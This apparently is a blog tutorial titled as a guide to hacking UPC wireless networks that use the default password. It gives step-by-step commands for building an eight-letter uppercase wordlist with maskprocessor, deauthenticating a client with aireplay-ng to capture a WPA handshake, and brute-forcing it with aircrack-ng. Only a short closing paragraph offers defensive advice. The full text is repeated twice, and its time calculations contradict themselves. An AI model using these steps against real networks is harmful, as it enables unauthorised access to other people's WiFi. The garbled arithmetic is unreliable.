In this tutorials we will show you how to hack UPC wireless networks with the default password which is a common thing for many UPC customers. The first step is to create a password list which contains all possible combinations of 8 capital letters. We will be using Maskprocessor in Kali Linux to create the password list. Than we will be capturing a 4 way handshake with Airodump-ng by deauthentication of a connected client with Aireplay-ng. The last step is to brute force the password using Aicrack-ng. In part 2 of this tutorial we will be using oclHashcat with the power of GPU since CPU will take way too much time with this passwords list.
How to hack UPC wireless networks in 3 steps
Step 1: Creating the password list with Maskprocessor
Step 2: Capturing the 4-way handshake with Airodump-ng
Step 3: Brute forcing the password with Aircrack-ng
Creating the password list with Maskprocessor
We will use maskprocessor to generate the password lists piping each letter to a file so we could use multiple computers to speed up brute forcing the password.
maskprocessor A?u?u?u?u?u?u?u -o /usr/A.txt
maskprocessor B?u?u?u?u?u?u?u -o /usr/B.txt
maskprocessor C?u?u?u?u?u?u?u -o /usr/C.txt
etc…. Repeat for every letter in the alphabet.
The filesize for each document will be approximately 60 GB. You can use the following command to see how many different combinations each file will contain:
maskprocessor A?u?u?u?u?u?u?u –combinations
8.031.810.176 combinations…
* 26 letters
208.827.064.576 possible combinations
Step 2: Capturing the handshake with Airodump-ng
The next thing we have to do is capture the handshake with Airodump-ng. We will be using Airodump-ng first to select our target and retrieve it’s BSSID and channel the WiFi access point is broadcasting on. Then we will use Aireplay-ng to de-authenticate a connected client to force a reconnect, which will give us the fourway handshake we need. Now let’s start Airodump-ng to find our target by using the following command:
airodump-ng mon0
Now pick your target’s BSSID and channel and restart Airodump-ng with the following command and look for a connected client:
airodump-ng –bssid [BSSID] -c [channel]-w [filepath to store .cap]wlan0mon
Open a new terminal and issue an deauthentication command for the connected client using Aireplay-ng.
aireplay-ng -0 2 -a [BSSID] -c [Client MAC] mon0
Deauthentication successful and the 4 way handshake is captured!
Step 3: Brute forcing the password with Aircrack-ng
Let’s do some maths first:
1x AMD hd7970 1000mhz core clock with oclHashcat v1.35 can do 142.000 combinations per second.
26^8 = 208,827,064,576 combinations
26^8 / 142,000 keys per second = 1470613 seconds
2,610,338 / 60 seconds = 24510 minutes
43,505 / 60 minutes = 408,5 hours
725 hours / 24 hours = 17 Days
50% chance of cracking the password in 8.5 days.
It takes 17 days to brute force a standard UPC password and hack UPC wireless networks with a single average videocard using oclHashcat. In this video we will be bruteforcing the file with Aircrack-ng and a processor which takes 100 times longer than bruteforcing the password with a GPU and oclHashcat. Take a look at part 2 of this tutorial on how to use oclHashcat with the power of GPU.
Use the following command to bruteforce the password with Aircrack-ng:
aircrack-ng -a 2 -b [Router BSSID] -w [Filepath to password list] [Filepath to .cap file]
Eventually it will crack the password:
Lesson learned
Nowadays fast GPU’s are available for decent prices and are often the standard in consumer laptops and desktops, especially when they are build for multimedia and gaming. With these powerful CPU’s and GPU’s the average home user has the power to crack passwords which are considered strong and safe by many end users. Even though 17 days is too long for most to crack a Wifi password it is accessible if you really want to. If you add 3 more letters, or even better, numbers or special characters like a ! or a $-sign it will be close to impossible to crack for an average home user.
How to hack UPC wireless networks in 3 steps
Step 1: Creating the password list with Maskprocessor
Step 2: Capturing the 4-way handshake with Airodump-ng
Step 3: Brute forcing the password with Aircrack-ng
Creating the password list with Maskprocessor
We will use maskprocessor to generate the password lists piping each letter to a file so we could use multiple computers to speed up brute forcing the password.
maskprocessor A?u?u?u?u?u?u?u -o /usr/A.txt
maskprocessor B?u?u?u?u?u?u?u -o /usr/B.txt
maskprocessor C?u?u?u?u?u?u?u -o /usr/C.txt
etc…. Repeat for every letter in the alphabet.
The filesize for each document will be approximately 60 GB. You can use the following command to see how many different combinations each file will contain:
maskprocessor A?u?u?u?u?u?u?u –combinations
8.031.810.176 combinations…
* 26 letters
208.827.064.576 possible combinations
Step 2: Capturing the handshake with Airodump-ng
The next thing we have to do is capture the handshake with Airodump-ng. We will be using Airodump-ng first to select our target and retrieve it’s BSSID and channel the WiFi access point is broadcasting on. Then we will use Aireplay-ng to de-authenticate a connected client to force a reconnect, which will give us the fourway handshake we need. Now let’s start Airodump-ng to find our target by using the following command:
airodump-ng mon0
Now pick your target’s BSSID and channel and restart Airodump-ng with the following command and look for a connected client:
airodump-ng –bssid [BSSID] -c [channel]-w [filepath to store .cap]wlan0mon
Open a new terminal and issue an deauthentication command for the connected client using Aireplay-ng.
aireplay-ng -0 2 -a [BSSID] -c [Client MAC] mon0
Deauthentication successful and the 4 way handshake is captured!
Step 3: Brute forcing the password with Aircrack-ng
Let’s do some maths first:
1x AMD hd7970 1000mhz core clock with oclHashcat v1.35 can do 142.000 combinations per second.
26^8 = 208,827,064,576 combinations
26^8 / 142,000 keys per second = 1470613 seconds
2,610,338 / 60 seconds = 24510 minutes
43,505 / 60 minutes = 408,5 hours
725 hours / 24 hours = 17 Days
50% chance of cracking the password in 8.5 days.
It takes 17 days to brute force a standard UPC password and hack UPC wireless networks with a single average videocard using oclHashcat. In this video we will be bruteforcing the file with Aircrack-ng and a processor which takes 100 times longer than bruteforcing the password with a GPU and oclHashcat. Take a look at part 2 of this tutorial on how to use oclHashcat with the power of GPU.
Use the following command to bruteforce the password with Aircrack-ng:
aircrack-ng -a 2 -b [Router BSSID] -w [Filepath to password list] [Filepath to .cap file]
Eventually it will crack the password:
Lesson learned
Nowadays fast GPU’s are available for decent prices and are often the standard in consumer laptops and desktops, especially when they are build for multimedia and gaming. With these powerful CPU’s and GPU’s the average home user has the power to crack passwords which are considered strong and safe by many end users. Even though 17 days is too long for most to crack a Wifi password it is accessible if you really want to. If you add 3 more letters, or even better, numbers or special characters like a ! or a $-sign it will be close to impossible to crack for an average home user.